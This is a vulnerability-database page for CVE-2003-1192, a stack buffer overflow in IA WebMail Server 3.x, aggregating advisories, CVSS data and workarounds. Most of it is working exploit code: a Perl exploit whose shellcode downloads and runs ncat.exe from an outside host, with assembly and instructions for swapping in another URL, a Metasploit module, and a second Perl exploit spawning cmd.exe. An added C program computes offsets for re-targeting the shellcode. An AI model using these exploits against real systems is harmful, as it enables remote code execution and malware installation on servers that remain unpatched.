CVE-2003-1192
CVSS 10.0
Published: 2003-11-03 00:00:00
Revised: 2008-09-05 16:36:17

[Original] Stack-based buffer overflow in IA WebMail Server 3.1.0 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD] IA WebMail Server Long GET Request Remote Buffer Overflow Vulnerability (CNNVD-200311-009)

        
        IA WebMail Server is a web-based mail server.
        IA WebMail Server does not adequately check the length of HTTP GET requests submitted by users. A remote attacker can exploit this to cause a buffer overflow and may execute arbitrary code on the system with the privileges of the WebMail process.
        If an attacker submits an HTTP GET request longer than 1044 bytes, the missing bounds check in the lstrcpyA() call overflows a stack buffer and overwrites the saved return address; a carefully constructed request may execute arbitrary instructions with the privileges of the WebMail process.
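The following C program is an added example, not code from IA WebMail or from any advisory on this page. It puts the pattern the description names, an unbounded lstrcpyA()-style copy of the GET path into a fixed stack buffer, next to a bounded version that rejects any path that would not fit. The 1040-byte buffer is an assumption taken from the public exploits below (1036 filler bytes plus four bytes of saved EBP before the return address); the product's real parser and buffer layout are not published, and the request format is simplified to a single request line. The long request is constructed in the program, not captured traffic.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size (see lead-in): the public exploits put the return
 * address 1040 bytes into the copied path, so a 1040-byte local buffer
 * reproduces the layout they target. */
#define PATH_BUF 1040

/* Find the request-target in "GET <path> HTTP/1.x". Sets *path to its
 * first byte and returns its length, or -1 if the line is not a GET. */
static long get_request_path(const char *line, const char **path)
{
    if (strncmp(line, "GET ", 4) != 0)
        return -1;
    const char *start = line + 4;
    const char *end = start;
    while (*end != ' ' && *end != '\r' && *end != '\n' && *end != '\0')
        end++;
    *path = start;
    return (long)(end - start);
}

/* VULNERABLE pattern, the shape CVE-2003-1192 describes: the path is
 * copied into a fixed stack buffer with no length check, so a path of
 * PATH_BUF bytes or more runs over the saved frame pointer and return
 * address. Kept only for contrast; never feed it untrusted input. */
static size_t handle_get_unbounded(const char *line)
{
    char buf[PATH_BUF];
    const char *path;
    long len = get_request_path(line, &path);
    if (len < 0)
        return 0;
    memcpy(buf, path, (size_t)len);   /* no comparison against sizeof buf */
    buf[len] = '\0';                  /* the terminator lstrcpyA would add */
    return strlen(buf);
}

/* Hardened handler: the path must fit together with its terminator.
 * Returns 0 and copies the path into 'out', -1 for a non-GET line, or
 * -2 when the path is too long (the advisory's trigger condition). */
static int handle_get_bounded(const char *line, char *out, size_t cap)
{
    const char *path;
    long len = get_request_path(line, &path);
    if (len < 0)
        return -1;
    if ((size_t)len >= cap)
        return -2;
    memcpy(out, path, (size_t)len);
    out[len] = '\0';
    return 0;
}

/* Build a request of the shape the public exploits send: "GET /", then
 * 'filler' bytes of 'a', then " HTTP/1.1". Returns the total length, or 0
 * if 'cap' is too small. Constructed test input, not captured traffic. */
static size_t build_long_get(char *dst, size_t cap, size_t filler)
{
    const char *head = "GET /";
    const char *tail = " HTTP/1.1\r\n\r\n";
    size_t n = 0;
    if (strlen(head) + filler + strlen(tail) + 1 > cap)
        return 0;
    memcpy(dst + n, head, strlen(head)); n += strlen(head);
    memset(dst + n, 'a', filler);        n += filler;
    memcpy(dst + n, tail, strlen(tail)); n += strlen(tail);
    dst[n] = '\0';
    return n;
}

int main(void)
{
    char req[2048];
    char out[PATH_BUF];
    const char *path;

    /* Ordinary request: both handlers behave. */
    printf("short path copied, %zu bytes\n",
           handle_get_unbounded("GET /index.html HTTP/1.1\r\n"));

    /* Path of 1044 bytes ("/" + 1043 filler), the length the description
     * gives as the overflow threshold. Only the bounded handler is run. */
    build_long_get(req, sizeof req, 1043);
    printf("path length %ld, bounded handler returns %d\n",
           get_request_path(req, &path),
           handle_get_bounded(req, out, sizeof out));
    return 0;
}
```

On the constructed 1044-byte path handle_get_bounded() returns -2, where the unbounded copy would already have written over the saved return address; the same length comparison is what an HTTP proxy or URL filter applies in front of a server that cannot be patched.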
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:truenorth_software:ia_webmail_server:3.1
cpe:/a:truenorth_software:ia_webmail_server:3.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1192
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1192
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-009
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/13580
(VENDOR_ADVISORY)  XF  iawebmailserver-get-bo(13580)
http://www.securityfocus.com/bid/8965
(UNKNOWN)  BID  8965
http://www.securiteam.com/windowsntfocus/6B002158UQ.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/6B002158UQ.html
http://www.osvdb.org/2757
(VENDOR_ADVISORY)  OSVDB  2757
http://www.derkeiler.com/Mailing-Lists/VulnWatch/2003-11/0001.html
(UNKNOWN)  VULNWATCH  20031103 IA WebMail Server 3.x Buffer Overflow Vulnerability
http://securitytracker.com/id?1008075
(UNKNOWN)  SECTRACK  1008075
http://secunia.com/advisories/10107
(VENDOR_ADVISORY)  SECUNIA  10107

- Vulnerability information

IA WebMail Server Long GET Request Remote Buffer Overflow Vulnerability
Critical  Boundary condition error
2003-11-03 00:00:00 2006-08-31 00:00:00
Remote  
        
        

- Advisory and patches

        Vendor patch:
        True North Software
        -------------------
        The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
        
        http://www.tnsoft.com/webmail.htm

- Vulnerability information (124)

IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit (EDBID:124)
windows remote
2003-11-19 Verified
80 Peter Winter-Smith
N/A
#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
# Application Specific Shellcode: URL Downloader
#  - www elitehaven net/ncat.exe (downloaded)
#  - c:\nc.exe                          (created)
#
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
#  - Windows XP Home SP1
#  - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it takes its addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
#  - WebMailsvr.exe exits without consuming 100% resources in most
#    cases.
#  - This has only been tested with IA WebMail 3.1, however it was
#    designed to exploit all versions.



use IO::Socket;

if(!($ARGV[1]))
{
 print "Usage: iawebmail.pl <victim> <port>\n\n";
 exit;
}

$shellcode =            "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
                        "\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
                        "\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
                        "\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
                        "\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
                        "\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
                        "\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
                        "\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
                        "\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
                        "\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
                        "\xFF\x36\x50\xFF\x15\x14\x52\x02" .
                        "\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
                        "\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
                        "\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
                        "\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
                        "\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
                        "\x15\x14\x52\x02\x10\x5A\x52\x31" .
                        "\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
                        "\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
                        "\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
                        "\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
                        "\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
                        "\x46\x69\x6C\x65\x41\xFF\x57\x69" .
                        "\x6E\x45\x78\x65\x63\xFF\x68\x74" .
                        "\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
                        "\x2E\x65\x6C\x69\x74\x65\x68\x61" .
                        "\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
                        "\x6E\x63\x61\x74\x2E\x65\x78\x65" .
                        "\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
                        "\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
                        "\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";                 # lands on the saved frame pointer after 1036 filler bytes
$eip = "\x33\xBD\x02\x10";     # 0x1002bd33 little-endian: jmp esp inside iaregdll.dll
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

print $victim $exploit;

print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";

sleep(5);

print "Done.\n";

close($victim);
exit;

########################################
##              SHELLCODE             ##
########################################
# ; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# ;
# ; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
# 
# int3
# jmp short killnull
# 
# next:
# pop edi
# 
# push ebp
# mov ebp, esp
# add esp, -24
# 
# push edi
# 
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# 
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# 
# pop edi
# 
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# 
# lea edx, [esp+20]
# push edx
# 
# jmp short over
# killnull:
# jmp short data
# over:
# 
# mov esi, edx
# push dword [esi]
# 
# call [100251DCh]	; LoadLibraryA
# 
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# 
# push eax
# 
# call [10025214h]	; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# 
# call eax
# 
# pop edx
# push edx
# 
# push dword [edx-20]
# 
# call [100251DCh]	; LoadLibraryA
# 
# pop edx
# push edx
# 
# 
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# 
# call [10025214h]	; GetProcAddress(kernel32.dll, WinExec);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# inc ecx
# push ecx
# 
# lea esi, [edx-16]	; file path
# push dword [esi]
# 
# call eax
# 
# int3
# 
# 
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#####################################################################

# milw0rm.com [2003-11-19]
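The following C program is an added example and not part of Peter Winter-Smith's exploit; it works through the bookkeeping that the shellcode comments above describe. Each string is stored with 0xFF in place of its terminating NUL, because a 0x00 byte would end the lstrcpyA() copy described in the advisory (and \x00 is the first bad character in the Metasploit module below); the 'nullify' loop then restores the zeros at run time with repne scasb and inc byte [edi-1]. Each lea edi,[edi+N] that follows must equal the previous string's length plus one, which is the rule the comments give for changing the URL. The code computes those operands for any string list and emulates the loop in portable C so the table can be checked before reassembling; it runs no x86 code. The loop-counter convention (bl loaded with 7, stop at 1) is taken from the listing above.

```c
#include <stdio.h>
#include <string.h>

#define MARK 0xFF   /* placeholder the shellcode uses instead of NUL */

/* Lay the strings out back to back, each followed by MARK. delta[i]
 * receives the operand of the lea that steps from string i to string i+1
 * (length plus one). Returns the table length, or 0 if cap is too small. */
static size_t build_table(const char *const *strs, size_t n,
                          unsigned char *blob, size_t cap, size_t *delta)
{
    size_t pos = 0;
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(strs[i]);
        if (pos + len + 1 > cap)
            return 0;
        memcpy(blob + pos, strs[i], len);
        blob[pos + len] = MARK;
        delta[i] = len + 1;
        pos += len + 1;
    }
    return pos;
}

/* Emulate the nullify loop: find the next MARK (repne scasb with al=0xFF)
 * and turn it into 0x00 (inc byte [edi-1] wraps 0xFF to 0x00), 'count'
 * times. Returns how many markers were converted; with fewer markers
 * than 'count' the real loop would scan on past the table. */
static size_t nullify(unsigned char *blob, size_t len, size_t count)
{
    size_t done = 0;
    for (size_t i = 0; i < len && done < count; i++) {
        if (blob[i] == MARK) {
            blob[i] = 0x00;
            done++;
        }
    }
    return done;
}

/* The loop counter: the shellcode loads bl with 7, decrements after each
 * pass and stops when bl == 1, so it converts bl_init - 1 markers. */
static size_t passes_for(unsigned bl_init)
{
    return bl_init > 1 ? bl_init - 1 : 0;
}

/* Check that the table contains no NUL before fix-up (it would truncate
 * the request) and that after fix-up every string is readable at the
 * offset the lea chain reaches. Returns 1 on success, 0 otherwise. */
static int verify_table(const char *const *strs, size_t n, unsigned bl_init)
{
    unsigned char blob[512];
    size_t delta[16];
    if (n > 16)
        return 0;
    size_t len = build_table(strs, n, blob, sizeof blob, delta);
    if (len == 0 || memchr(blob, 0x00, len) != NULL)
        return 0;
    if (nullify(blob, len, passes_for(bl_init)) != n)
        return 0;
    size_t off = 0;
    for (size_t i = 0; i < n; i++) {
        if (strcmp((const char *)blob + off, strs[i]) != 0)
            return 0;
        off += delta[i];
    }
    return 1;
}

int main(void)
{
    /* The six strings from the shellcode's data block, in order. */
    const char *const strs[] = {
        "URLMON.DLL", "URLDownloadToFileA", "WinExec",
        "http://www.elitehaven.net/ncat.exe", "c:\\nc.exe", "kernel32.dll",
    };
    unsigned char blob[512];
    size_t delta[6];
    size_t len = build_table(strs, 6, blob, sizeof blob, delta);
    for (size_t i = 0; i < 6; i++)
        printf("lea edi, [edi+%zu]   ; after '%s'\n", delta[i], strs[i]);
    printf("table %zu bytes, bl=7 gives %zu passes, verify=%d\n",
           len, passes_for(7), verify_table(strs, 6, 7));
    return 0;
}
```

For the original strings the computed operands are 11, 19, 8, 35 and 10, matching the lea values in the listing (the last one written there as lea edi,[edi+09] plus inc edi). Replacing the URL changes only its own delta, and verify_table() fails if the loop counter no longer covers every marker.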
		

- Vulnerability information (16767)

IA WebMail 3.x Buffer Overflow (EDBID:16767)
windows remote
2010-05-09 Verified
80 metasploit
N/A
##
# $Id: ia_webmail.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IA WebMail 3.x Buffer Overflow',
			'Description'    => %q{
				This exploits a stack buffer overflow in the IA WebMail server.
				This exploit has not been tested against a live system at
				this time.
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2003-1192'],
					[ 'OSVDB', '2757'],
					[ 'BID', '8965'],
					[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'BadChars'    => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'IA WebMail 3.x',
						{
							'Ret'    => 0x1002bd33,
							'Length' => 1036
						},
					]
				],
			'DisclosureDate' => 'Nov 3 2003',
			'DefaultTarget'  => 0))
	end

	def exploit
		print_status("Sending request...")

		send_request_raw({
			'uri' =>
				"/" + ("o" * target['Length']) +
				"META" +
				[target.ret].pack('V') +
				payload.encoded
		}, 2)

		handler
	end

end
		

- Vulnerability information (23334)

IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun Vulnerability (EDBID:23334)
windows remote
2003-11-03 Verified
0 Peter Winter-Smith
N/A
source: http://www.securityfocus.com/bid/8965/info

IA WebMail Server is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution. 

#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => "8180",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host" }

$remote->autoflush(1);

# Shellcode: writes "cmd.exe" onto the stack one byte at a time (so the
# request carries no NUL bytes) and calls msvcrt system() through a
# hard-coded, OS-build-specific address. The leading INT3 stops in a
# debugger if one is attached.
$shellcode = join ("",
"\x90", # - NOP
"\xCC", # - INT3
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x8B\xEC", # - MOV EBP, ESP
"\x55", # - PUSH EBP
"\x8B\xEC", # - MOV EBP, ESP
"\x33\xFF", # - XOR EDI, EDI
"\x57", # - PUSH EDI
"\x83\xEC\x04", # - SUB ESP, 4
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50", # - PUSH EAX
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50", # - PUSH EAX
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
"\x5F" # - POP EDI
);

# Return address 0x0012f84c, a stack address inside the copied request,
# written little-endian. Only three bytes are sent: the NUL that
# terminates the copy supplies the final 0x00 of the address.
$eip = "\x4c\xf8\x12";

#0012f84C

#$eip = "AAAA";
# Shellcode first, then padding so that $eip follows exactly 1040 bytes
# after "GET /", the same layout as EDB 124 above (1036 filler bytes plus
# 4 bytes of saved EBP).
$request = join ("", "GET /", $shellcode, "A"x(1040-length($shellcode)),
$eip, " HTTP/1.1\r
Host: $host\r
Connection: close\r
\r
\r\n");

print $remote $request;
sleep(1);

close $remote;

		

- Vulnerability information (F82938)

IA WebMail 3.x Buffer Overflow (PacketStormID:F82938)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2003-1192

This exploits a stack overflow in the IA WebMail server. This exploit has not been tested against a live system at this time.

(Module source identical to the EDBID 16767 listing above.)
    

- Vulnerability information

2757
IA WebMail Server GET Request Overflow
Remote / Network Access, Input Manipulation
Loss of Integrity, Workaround
Exploit Public, Exploit Commercial

- Vulnerability description

IA Webmail contains a flaw that allows a remote attacker to execute arbitrary code. The issue is due to a boundary error in the web service when handling HTTP GET requests. This can be exploited to cause a buffer overflow by sending an overly long, specially crafted GET request to a vulnerable system, resulting in the attacker being able to execute code remotely.

- Timeline

2003-11-03 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. The flaw can be mitigated with the following workarounds: 1) Filter long requests in an HTTP proxy or firewall with URL filtering capabilities. 2) Restrict access to the web service (default port 8180/tcp), allowing only trusted IPs to connect.

- References

- Vulnerability author

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites.